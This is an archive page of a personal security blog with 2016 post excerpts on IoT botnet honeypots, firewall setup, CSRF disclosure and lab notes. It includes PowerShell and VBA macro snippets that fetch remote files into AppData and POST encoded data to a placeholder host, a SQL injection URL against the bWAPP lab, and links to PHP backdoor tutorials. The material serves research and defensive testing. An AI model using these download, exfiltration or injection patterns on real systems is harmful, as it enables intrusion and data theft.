Posts

Showing posts from 2016

IoT Malware Analysis - CnC Server - Part 3

Through the information gathered inside of the binaries I began searching for unique strings on Google.  One of the unique strings that I searched for was "HTTPFLOOD GHP".  This pulled back less than 10 results and the first one was from the site hxxp://psbdmp.com/wT1htV9b.  This contained the source code for what they called "Palkia Server.c".

This particular piece of source code was found to have been leaked on 2016-11-12 09:58:05 according to the timestamp on the paste.  I have not validated that the binary in which I found the string matches up with this particular CnC Server source code.

After looking at the source code and understanding the logic, verifying there were no backdoors and other intents to infect my systems I compiled the source code on a temporary server.  Upon execution you need to specify which port it listens on for the bot connections and the number of threads it will utilize.

After you specify the port and the number of threads it begins to …

IoT Malware Analysis - Observations and Statistics - Part 2

On the previous post that I published I utilized a python program to emulate a telnet server, captured commands that were sent to the telnet server, and then utilized those commands to research the binaries that were collected.

In this post I am going to provide information on what happened when 2 of my servers became infected with the malware, statistics on the username and password combinations used, and statistics of which IP Addresses I observed the most attempting to login to my telnet server.

The Mirai botnet gains its popularity in causing Distributed Denial of Service (DDoS) attacks.  This is exactly what happened to both of my honeypot servers that were infected.

As you can see in the above screenshot upon initial infection of the server you see the command "SCANNER ON".  This command causes the infected device to begin scanning for other IP Addresses at random to see if port 23 is open.  If the device can be reached over port 23 then a basic script of logging in, s…

IoT Malware Analysis - Botnets being created through weak credentials... - Part 1

I became curios about the spreading IoT malware through default usernames and passwords due to multiple media articles.  So I spun up a VPS server and started using a tool created by Robert David Graham called telnetlogger.  Immediately I saw the constant barrage of traffic that was being generated.  Now the next question I had was what are the commands that are being executed on these IoT devices.

I first evaluated the source code provided on the Github site for telnetlogger to see if I wanted to re-write some of it to log the commands being sent in.  I then searched around for a honeypot that would emulate a telnet server.  Then I decided to write my own in python.  It is not perfect but it accomplishes logging up to 9 commands after a successful login.  The source code can be found on my github page.

After running this telnet emulator for less than 48 hours I had logged some interesting commands that were trying to download a shell script to then pull down additional binaries that …

Powershell - Scripts to Download and Save a File AND POST Data to a Web Page

Recently I created a couple of simple Powershell scripts to download and save a file and then send a POST Request to a Site.  Below are the scripts that I created.

$wc = New-Object System.Net.WebClient$wc.Headers.Add("User-Agent","IE6")        $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials $response =$wc.DownloadString("http://blah.com/master.txt") Set-Content -Value $response -Path$env:APPDATA\Microsoft\output.txt
---
$url = "http://blah.com/"$encodedData = "b3V0Ym91bmQ%3d"
$params = New-Object System.Collections.Specialized.NameValueCollection$params.Add('poster','blah55') $params.Add('syntax','text')$params.Add('content',$encodedData)$wc = New-Object System.Net.WebClient $wc.Headers.Add("User-Agent","IE6")$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy $wc.Proxy.Credent… VBA - Script to Download a file from a URL Below is a Visual Basic for Applications script I quickly build to download a file through a Macro to the computer. This was to test the capability of being able to do it and finding a way to prevent it from occurring. Sub dFile() ' ' vTest Macro ' ' Dim myURL As String dURL = "http://blah/text.zip" Dim WinHttpReq As Object Dim fileName As String fileName = Environ("AppData") & "\microsoft\text.zip" Set WinHttpReq = CreateObject("Microsoft.XMLHTTP") WinHttpReq.Open "GET", dURL WinHttpReq.send If WinHttpReq.Status = 200 Then Set oStream = CreateObject("ADODB.Stream") oStream.Open oStream.Type = 1 oStream.Write WinHttpReq.responseBody oStream.SaveToFile fileName, 2 oStream.Close End If End Sub Python - Script to Send an Email through Gmail Below is a python script that I was using to send an email through a gmail account: #!/usr/bin/python import smtplib fromAddress='email@gmail.com' toAddress='ltrappett@gmail.com' msg='To another email address.' username='email@gmail.com' password='specific use password' server = smtplib.SMTP('smtp.gmail.com:587') server.starttls() server.login(username, password) server.sendmail(fromAddress, toAddress, msg) server.quit() iptables - Setup for a home router with 3 vlans I began to create a home router with 2 NICs. The first NIC is for the WAN and then the second NIC is for the LAN. The LAN NIC is then split up with 3 vlans. The vlans are serving the purposes of the first being for a Wireless LAN, second being the Wired LAN and the third being an Untrusted Network for testing and whatever else. The NIC does plug into a switch that is then VLANed respectively also. My purpose of posting it is to show how it could be done and understand it is probably not without bugs. The main reason I am creating the 3 vlans is to separate out and monitor the IoT devices that are starting to accumulate in my house and separate my testing lab from everything else due to the malware that I sometimes will detonate in it. Below is the configuration of the /etc/network/interfaces file to establish the vlans. After that configuration is what I started with to built out iptables for each environment. I am also running a caching bind9 server and plan to setup squid for… Weevely - PHP Backdoor Recently at BSides SLC 2016 I had a class which introduced the usage of Weevely. Here are a couple of links that complemented the training that I had: http://exploiterz.blogspot.com/2013/09/how-to-backdoor-webserver-using-weevely.html http://null-byte.wonderhowto.com/forum/hiob-generate-web-backdoors-php-using-weevely-kali-linux-0158905/ Simple Script to Configure iptables I have been utilizing Cloud at Cost to put together a variety of labs. I build the below iptables script to configure it for a base installation until I can configure it further. #!/bin/bash allowedTCPInbound="22" #allowedUDPInbound="53" iptables -F iptables -X iptables -Z iptables -P INPUT DROP iptables -P FORWARD DROP iptables -P OUTPUT ACCEPT iptables -A INPUT -s 127.0.0.1 -j ACCEPT iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT for port in$allowedTCPInbound; do #iptables -A INPUT -p tcp --dport $port -j LOG --log-prefix '*** Allowed TCP Connection ***' iptables -A INPUT -p tcp --dport$port -j ACCEPT done #for port in $allowedUDPInbound; do # iptables -A INPUT -p udp --dport$port -j LOG --log-prefix '*** Allowed UDP Connection ***' # iptables -A INPUT -p udp --dport $port -j ACCEPT #done iptables -A INPUT -p udp --dport 67 -j DROP # Added this due to the amount of traffic that is generated from this broadcast - … BSides 2016 Hackers Challenge At BSides 2016 I participated in their Hackers Challenge. The challenges were based on reverse engineering, network packet analysis, and many other puzzles that you needed to figure out. When I had hit the wall at 3AM in the morning on March 11th I was in 2nd place. By the end of the competition which was at 10AM I had dropped to 7th. The challenge was great! Thanks BSides... Check-out the django.nV project. This is a project that was used in the Hackers Challenge but was adapted from its original state. Screenshot of being in 2nd place at 3AM. Screenshot of being in 7th place at the end of the competition. One thing to note is most of the challenges were worth 4,000 points in the beginning. If you did the challenge and no-one else you kept the 4,000 points. For each participant that accomplished the challenge you had to divide the points with them. Responsible Disclosure of CSRF in PHP Fusion 9 Recently I did some testing with PHP Fusion 9 and found that I could create additional users as the admin is logged in due to the application not protecting against CSRF. I reached out to the development team and they had it fixed within 72 hours. Below is the original video that I sent them and then they provided one back showing they had fixed it and to test it again. Video - Adding a user account through CSRF Then here is the response about fixing the vulnerability in version 9. Here is the youtube video that he posted as shown above in the screenshot: https://www.youtube.com/watch?v=5eLfA_ZEujQ&feature=youtu.be Forensics - Mount Windows Partition Showing the System Files Mount a windows partition showing the system files: mount -o ro,show_sys_files,streams_interface=windows /dev/sdb2 /mnt/analysis Taken from "Super Time Line Analysis - SANS DFIR Webcast" https://www.youtube.com/watch?v=C4jNfXZ90fw CyberSecurity Challenge Australia 2014 In a Box - YAWU - Yet Another Write-up This challenge can be downloaded from vulnhub.com. Web Application Pentest Section 80 points - Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag. Looking at the web page we notice when the page is first visited that the link to the "Blog" is disabled. Somehow we need to reenable the link to get the flag. Below is a python script to quickly pass a GET request on the index.py page. Notice that among the cookies returned is a vip=0. With this sort of return you can suppose that a VIP user is going to be a value other than 0. If I modify it to be a 1 the link to the Blog becomes enabled. With clicking on the Blog link then the flag appears. 160 points - Gain access to the Blog as a registered user to reveal the hidden flag. The blog allows you to insert comments. Checking to see if XSS is possible as a comment is inserted. At the bottom of the textbox you can see how you can make text bold, italicized… cmd.exe Count Lines returned with netstat from the command line I was testing the threshold of the number of connections on a web server and threw together a dos command to accomplish the minor task. Inside the command prompt I executed: netstat -an | find /i "<ip address>" | find /N /i "ESTABLISHED" tshark - More than I ever wanted to know... Recently I purchased the book, "The Practice of Network Security Monitoring" by Richard Bejtlich. I was reading in chapter 7 of the book about the Digital Corpora project located at http://www.digitalcorpora.org. In the chapter he presents the scenario of the "Nitroba University Harassment Scenario". A pcap can be downloaded about how a teacher was being harassed by a student and the object of the scenario is to identify who did it and with what evidence. The scenario and the files you need are located at the following link. In the book they are using the scenario to explain and teach about the tool called Xplico. However, I am going to use the scenario to identify useful tshark commands that can be used in such an investigation. The first lead in the investigation is that of an IP Address. "The mail header shows that the mail message originated from the IP address 140.247.62.34, which is a Nitroba student dorm room. " IP Address: 140.247.62.34. I… File and Folder Auditing with Powershell http://blogs.technet.com/b/zarkatech/archive/2012/01/14/audit-file-server-permissions-using-powershell.aspx$ErrorActionPreference = "Continue"
$strComputer =$env:ComputerName
$colDrives = Get-PSDrive -PSProvider Filesystem$StartPath = "\\myserver\share"
Get-ChildItem -LiteralPath $StartPath -Recurse | ForEach {$FullPath = Get-Item -LiteralPath (Get-Item -LiteralPath $_.PSPath) (Get-Item -LiteralPath$FullPath).GetAccessControl() |
Select * -Expand Access |
Select @{N='Server Name';E={$strComputer}}, @{N='Full Path';E={$FullPath}},
@{N='Type';E={If($FullPath.PSIsContainer -eq$True) {'D'} Else {'F'}}},
@{N='Owner';E={$_.Owner}}, @{N='Trustee';E={$_.IdentityReference}} } |
#@{N='Inherited';E={$_.IsInherited}}, #@{N='Inheritance Flags';E={$_.InheritanceFlags}},
…

Audit File and Folder Permissions - Powershell

################################################################################
# AUDIT FILE & FOLDER PERMISSIONS v1.1
# by Roman Zarka | Microsoft Services
################################################################################

$ErrorActionPreference = "Continue"$strComputer = $env:ComputerName$colDrives = Get-PSDrive -PSProvider Filesystem
$StartPath = "\\server\share" Get-ChildItem -LiteralPath$StartPath -Recurse |
ForEach {
$FullPath = Get-Item -LiteralPath (Get-Item -LiteralPath$_.PSPath)
(Get-Item -LiteralPath $FullPath).GetAccessControl() | Select * -Expand Access | Select @{N='Server Name';E={$strComputer}},
@{N='Full Path';E={$FullPath}}, @{N='Type';E={If($FullPath.PSIsContainer -eq $True) {'D'} Else {'F'}}}, @{N='Owner';E={$_.Owner}},
@{N='Trustee';E={\$_.IdentityReference}} } |
…

Notes from bWAPP v2.2

These are my quick notes that I recorded as I worked through bWAPP v2.2

--- SQLi GET / Search Results - With security level set to low

URL with SQLi:
http://bwapp/sqli_1.php?title=a' union SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search

The above query was taken from the MySQL SQL Injection Cheat Sheet located here.  The purpose of this query is to have returned the database and table names of the database.  I also had to experiment with the number of columns that were expected and how it was displayed.

Now I need to find out the structure of the tables...

URL for SQLi: